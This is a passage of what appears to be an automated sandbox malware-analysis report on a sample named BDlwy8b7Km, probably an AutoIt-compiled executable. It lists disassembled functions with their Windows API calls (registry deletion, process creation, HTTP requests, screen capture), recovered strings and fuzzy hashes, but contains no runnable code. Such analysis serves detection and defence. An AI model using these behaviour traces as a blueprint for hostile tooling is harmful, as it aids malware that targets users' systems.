                                                    • Part of subcall function 005AF9F2: _wcslen.LIBCMT ref: 005AF9FD
                                                    • Part of subcall function 005F2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005F2BFA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                  • API String ID: 1103490817-4258414348
                                                  • Opcode ID: aec8a8a4aa198a594c6ea4516fbc55269004357309bb28bf0ae97426784e756c
                                                  • Instruction ID: a9248b1ca63fe63a73dd8828ee9ce65f3013f176ce27fadae02bf15e4d653cfd
                                                  • Opcode Fuzzy Hash: aec8a8a4aa198a594c6ea4516fbc55269004357309bb28bf0ae97426784e756c
                                                  • Instruction Fuzzy Hash: 42E19931208B129FCB14DF24D45096ABBE2BFD8314F51895DF8969B3A2D731ED4ACB81
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$BuffCharUpper
                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                  • API String ID: 1256254125-909552448
                                                  • Opcode ID: 77435cb24420ad5b894f57c3fe7fc8f80d709edbaf2a0184b64706f5ccea65ab
                                                  • Instruction ID: 7791123dbfac706ef6becd0ae66e8e51abf821fbeb189bf2e6166b32a24e50cc
                                                  • Opcode Fuzzy Hash: 77435cb24420ad5b894f57c3fe7fc8f80d709edbaf2a0184b64706f5ccea65ab
                                                  • Instruction Fuzzy Hash: 0871DF3268412A8BCB20DE7CD9515FE37A3AFA1760F290128EC6697384E631DDC5C3A0
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0062835A
                                                  • _wcslen.LIBCMT ref: 0062836E
                                                  • _wcslen.LIBCMT ref: 00628391
                                                  • _wcslen.LIBCMT ref: 006283B4
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006283F2
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0062361A,?), ref: 0062844E
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00628487
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 006284CA
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00628501
                                                  • FreeLibrary.KERNEL32(?), ref: 0062850D
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0062851D
                                                  • DestroyIcon.USER32(?), ref: 0062852C
                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00628549
                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00628555
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                  • String ID: .dll$.exe$.icl
                                                  • API String ID: 799131459-1154884017
                                                  • Opcode ID: 01fa9fa990da13ad581adea3f066ae278f33a88c3cc6aaf35eb4a5b6d0fcafa4
                                                  • Instruction ID: a14b23ca4746800f289dad6fd222f2f68616a0456d0bc49820b84d7366f84dab
                                                  • Opcode Fuzzy Hash: 01fa9fa990da13ad581adea3f066ae278f33a88c3cc6aaf35eb4a5b6d0fcafa4
                                                  • Instruction Fuzzy Hash: 3761ED71500A26BFEB24DF64DC45BFE7BA9BF48B21F104109F815E61D1DB74AA90CBA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                  • API String ID: 0-1645009161
                                                  • Opcode ID: bc90e3dd2131a83cd03e464db405ca9bc6578ed969fc6cab46610e5f18a2ff98
                                                  • Instruction ID: 6e240656d2e2837c3982e56d7637bdf29f0d2c13acb48504fc038db43e0741a9
                                                  • Opcode Fuzzy Hash: bc90e3dd2131a83cd03e464db405ca9bc6578ed969fc6cab46610e5f18a2ff98
                                                  • Instruction Fuzzy Hash: CF81097161060ABBDF20AFA4DC46FBE3FA9FF59300F044426F904AA292EB70D915C791
                                                  APIs
                                                  • LoadIconW.USER32(00000063), ref: 005F5A2E
                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 005F5A40
                                                  • SetWindowTextW.USER32(?,?), ref: 005F5A57
                                                  • GetDlgItem.USER32(?,000003EA), ref: 005F5A6C
                                                  • SetWindowTextW.USER32(00000000,?), ref: 005F5A72
                                                  • GetDlgItem.USER32(?,000003E9), ref: 005F5A82
                                                  • SetWindowTextW.USER32(00000000,?), ref: 005F5A88
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 005F5AA9
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 005F5AC3
                                                  • GetWindowRect.USER32(?,?), ref: 005F5ACC
                                                  • _wcslen.LIBCMT ref: 005F5B33
                                                  • SetWindowTextW.USER32(?,?), ref: 005F5B6F
                                                  • GetDesktopWindow.USER32 ref: 005F5B75
                                                  • GetWindowRect.USER32(00000000), ref: 005F5B7C
                                                  • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 005F5BD3
                                                  • GetClientRect.USER32(?,?), ref: 005F5BE0
                                                  • PostMessageW.USER32(?,00000005,00000000,?), ref: 005F5C05
                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 005F5C2F
                                                  Similarity
                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                  • String ID:
                                                  • API String ID: 895679908-0
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[e
                                                  • API String ID: 176396367-3722887849
                                                  APIs
                                                  • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 005B00C6
                                                    • Part of subcall function 005B00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0066070C,00000FA0,88E828E0,?,?,?,?,005D23B3,000000FF), ref: 005B011C
                                                    • Part of subcall function 005B00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,005D23B3,000000FF), ref: 005B0127
                                                    • Part of subcall function 005B00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,005D23B3,000000FF), ref: 005B0138
                                                    • Part of subcall function 005B00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 005B014E
                                                    • Part of subcall function 005B00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005B015C
                                                    • Part of subcall function 005B00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005B016A
                                                    • Part of subcall function 005B00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005B0195
                                                    • Part of subcall function 005B00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005B01A0
                                                  • ___scrt_fastfail.LIBCMT ref: 005B00E7
                                                    • Part of subcall function 005B00A3: __onexit.LIBCMT ref: 005B00A9
                                                  Strings
                                                  • kernel32.dll, xrefs: 005B0133
                                                  • SleepConditionVariableCS, xrefs: 005B0154
                                                  • WakeAllConditionVariable, xrefs: 005B0162
                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 005B0122
                                                  • InitializeConditionVariable, xrefs: 005B0148
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                  • API String ID: 66158676-1714406822
                                                  APIs
                                                  • CharLowerBuffW.USER32(00000000,00000000,0062CC08), ref: 00604527
                                                  • _wcslen.LIBCMT ref: 0060453B
                                                  • _wcslen.LIBCMT ref: 00604599
                                                  • _wcslen.LIBCMT ref: 006045F4
                                                  • _wcslen.LIBCMT ref: 0060463F
                                                  • _wcslen.LIBCMT ref: 006046A7
                                                    • Part of subcall function 005AF9F2: _wcslen.LIBCMT ref: 005AF9FD
                                                  • GetDriveTypeW.KERNEL32(?,00656BF0,00000061), ref: 00604743
                                                  Strings
                                                  Similarity
                                                  • API ID: _wcslen$BuffCharDriveLowerType
                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                  • API String ID: 2055661098-1000479233
                                                  APIs
                                                    • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
                                                  • DragQueryPoint.SHELL32(?,?), ref: 00629147
                                                    • Part of subcall function 00627674: ClientToScreen.USER32(?,?), ref: 0062769A
                                                    • Part of subcall function 00627674: GetWindowRect.USER32(?,?), ref: 00627710
                                                    • Part of subcall function 00627674: PtInRect.USER32(?,?,00628B89), ref: 00627720
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 006291B0
                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006291BB
                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006291DE
                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00629225
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0062923E
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00629255
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00629277
                                                  • DragFinish.SHELL32(?), ref: 0062927E
                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00629371
                                                  Strings
                                                  Similarity
                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#f
                                                  • API String ID: 221274066-3566790704
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0061B198
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0061B1B0
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0061B1D4
                                                  • _wcslen.LIBCMT ref: 0061B200
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0061B214
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0061B236
                                                  • _wcslen.LIBCMT ref: 0061B332
                                                    • Part of subcall function 006005A7: GetStdHandle.KERNEL32(000000F6), ref: 006005C6
                                                  • _wcslen.LIBCMT ref: 0061B34B
                                                  • _wcslen.LIBCMT ref: 0061B366
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0061B3B6
                                                  • GetLastError.KERNEL32(00000000), ref: 0061B407
                                                  • CloseHandle.KERNEL32(?), ref: 0061B439
                                                  • CloseHandle.KERNEL32(00000000), ref: 0061B44A
                                                  • CloseHandle.KERNEL32(00000000), ref: 0061B45C
                                                  • CloseHandle.KERNEL32(00000000), ref: 0061B46E
                                                  • CloseHandle.KERNEL32(?), ref: 0061B4E3
                                                  Similarity
                                                  • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 2178637699-0
                                                  APIs
                                                  • GetMenuItemCount.USER32(00661990), ref: 005D2F8D
                                                  • GetMenuItemCount.USER32(00661990), ref: 005D303D
                                                  • GetCursorPos.USER32(?), ref: 005D3081
                                                  • SetForegroundWindow.USER32(00000000), ref: 005D308A
                                                  • TrackPopupMenuEx.USER32(00661990,00000000,?,00000000,00000000,00000000), ref: 005D309D
                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 005D30A9
                                                  Strings
                                                  Similarity
                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                  • String ID: 0
                                                  • API String ID: 36266755-4108050209
                                                  APIs
                                                  • DestroyWindow.USER32(?,?), ref: 00626DEB
                                                    • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00626E5F
                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00626E81
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00626E94
                                                  • DestroyWindow.USER32(?), ref: 00626EB5
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00590000,00000000), ref: 00626EE4
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00626EFD
                                                  • GetDesktopWindow.USER32 ref: 00626F16
                                                  • GetWindowRect.USER32(00000000), ref: 00626F1D
                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00626F35
                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00626F4D
                                                    • Part of subcall function 005A9944: GetWindowLongW.USER32(?,000000EB), ref: 005A9952
                                                  Strings
                                                  Similarity
                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                  • String ID: 0$tooltips_class32
                                                  • API String ID: 2429346358-3619404913
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0060C4B0
                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0060C4C3
                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0060C4D7
                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0060C4F0
                                                  • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0060C533
                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0060C549
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0060C554
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0060C584
                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0060C5DC
                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0060C5F0
                                                  • InternetCloseHandle.WININET(00000000), ref: 0060C5FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                  • String ID:
                                                  • API String ID: 3800310941-3916222277
                                                  • Opcode ID: 40c68088cef33f53fa0b1c39e7716c9addf7c160dbe30508a001821e7c3d353c
                                                  • Instruction ID: 364fb42bd341d61e0b8ba9e76fd4e44e90921ed237584f1b2636c97b0b1a5105
                                                  • Opcode Fuzzy Hash: 40c68088cef33f53fa0b1c39e7716c9addf7c160dbe30508a001821e7c3d353c
                                                  • Instruction Fuzzy Hash: DD518EB4540604BFDB368F60CD48AAB7BFEFF08364F004619F94596290DB30E915DBA0
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00628592
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 006285A2
                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 006285AD
                                                  • CloseHandle.KERNEL32(00000000), ref: 006285BA
                                                  • GlobalLock.KERNEL32(00000000), ref: 006285C8
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006285D7
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 006285E0
                                                  • CloseHandle.KERNEL32(00000000), ref: 006285E7
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 006285F8
                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,0062FC38,?), ref: 00628611
                                                  • GlobalFree.KERNEL32(00000000), ref: 00628621
                                                  • GetObjectW.GDI32(?,00000018,000000FF), ref: 00628641
                                                  • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00628671
                                                  • DeleteObject.GDI32(00000000), ref: 00628699
                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 006286AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                  • String ID:
                                                  • API String ID: 3840717409-0
                                                  • Opcode ID: 95b404e06f66a1aa8aa6b1f4685ac2613bc209b83ce5f5e4a2c3a86b59e36bb1
                                                  • Instruction ID: c91e0c96a2a0ca32de153ddc38e8d9e712759003762e621cf9941a948fb959e0
                                                  • Opcode Fuzzy Hash: 95b404e06f66a1aa8aa6b1f4685ac2613bc209b83ce5f5e4a2c3a86b59e36bb1
                                                  • Instruction Fuzzy Hash: 2141FC75601615AFDB21DF65DC48EAE7BBAEF89761F104058F905E7250DB30AA02CF60
                                                  APIs
                                                  • VariantInit.OLEAUT32(00000000), ref: 00601502
                                                  • VariantCopy.OLEAUT32(?,?), ref: 0060150B
                                                  • VariantClear.OLEAUT32(?), ref: 00601517
                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 006015FB
                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00601657
                                                  • VariantInit.OLEAUT32(?), ref: 00601708
                                                  • SysFreeString.OLEAUT32(?), ref: 0060178C
                                                  • VariantClear.OLEAUT32(?), ref: 006017D8
                                                  • VariantClear.OLEAUT32(?), ref: 006017E7
                                                  • VariantInit.OLEAUT32(00000000), ref: 00601823
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                  • API String ID: 1234038744-3931177956
                                                  • Opcode ID: 441202173b166958359b85e59ba970a3705a91a5d0fab81757f3c05669ad0e57
                                                  • Instruction ID: 93ed0f4c43fd6a8796f4425e39b349d1a43955f77043864314725430ea73e60e
                                                  • Opcode Fuzzy Hash: 441202173b166958359b85e59ba970a3705a91a5d0fab81757f3c05669ad0e57
                                                  • Instruction Fuzzy Hash: FAD118B1A40506DBDB199F64D889BBEBBB6BF86700F10805AF4069F2C0DB30DC46DB61
                                                  APIs
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                    • Part of subcall function 0061C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0061B6AE,?,?), ref: 0061C9B5
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061C9F1
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA68
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA9E
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061B6F4
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0061B772
                                                  • RegDeleteValueW.ADVAPI32(?,?), ref: 0061B80A
                                                  • RegCloseKey.ADVAPI32(?), ref: 0061B87E
                                                  • RegCloseKey.ADVAPI32(?), ref: 0061B89C
                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0061B8F2
                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0061B904
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 0061B922
                                                  • FreeLibrary.KERNEL32(00000000), ref: 0061B983
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0061B994
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                  • API String ID: 146587525-4033151799
                                                  • Opcode ID: e0883bf367e2728065231304d2df160041d0234e2e9f2e0572d5726b3fd75e75
                                                  • Instruction ID: 7fa150cbfe4cca87347df064fc1d0afcd6b6c1e7a83e753a5b595b6c77360c48
                                                  • Opcode Fuzzy Hash: e0883bf367e2728065231304d2df160041d0234e2e9f2e0572d5726b3fd75e75
                                                  • Instruction Fuzzy Hash: F5C17031204202AFD710DF24C495FAABBE6BF85318F18955CF45A4B3A2CB75ED86CB91
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 006125D8
                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 006125E8
                                                  • CreateCompatibleDC.GDI32(?), ref: 006125F4
                                                  • SelectObject.GDI32(00000000,?), ref: 00612601
                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0061266D
                                                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 006126AC
                                                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 006126D0
                                                  • SelectObject.GDI32(?,?), ref: 006126D8
                                                  • DeleteObject.GDI32(?), ref: 006126E1
                                                  • DeleteDC.GDI32(?), ref: 006126E8
                                                  • ReleaseDC.USER32(00000000,?), ref: 006126F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
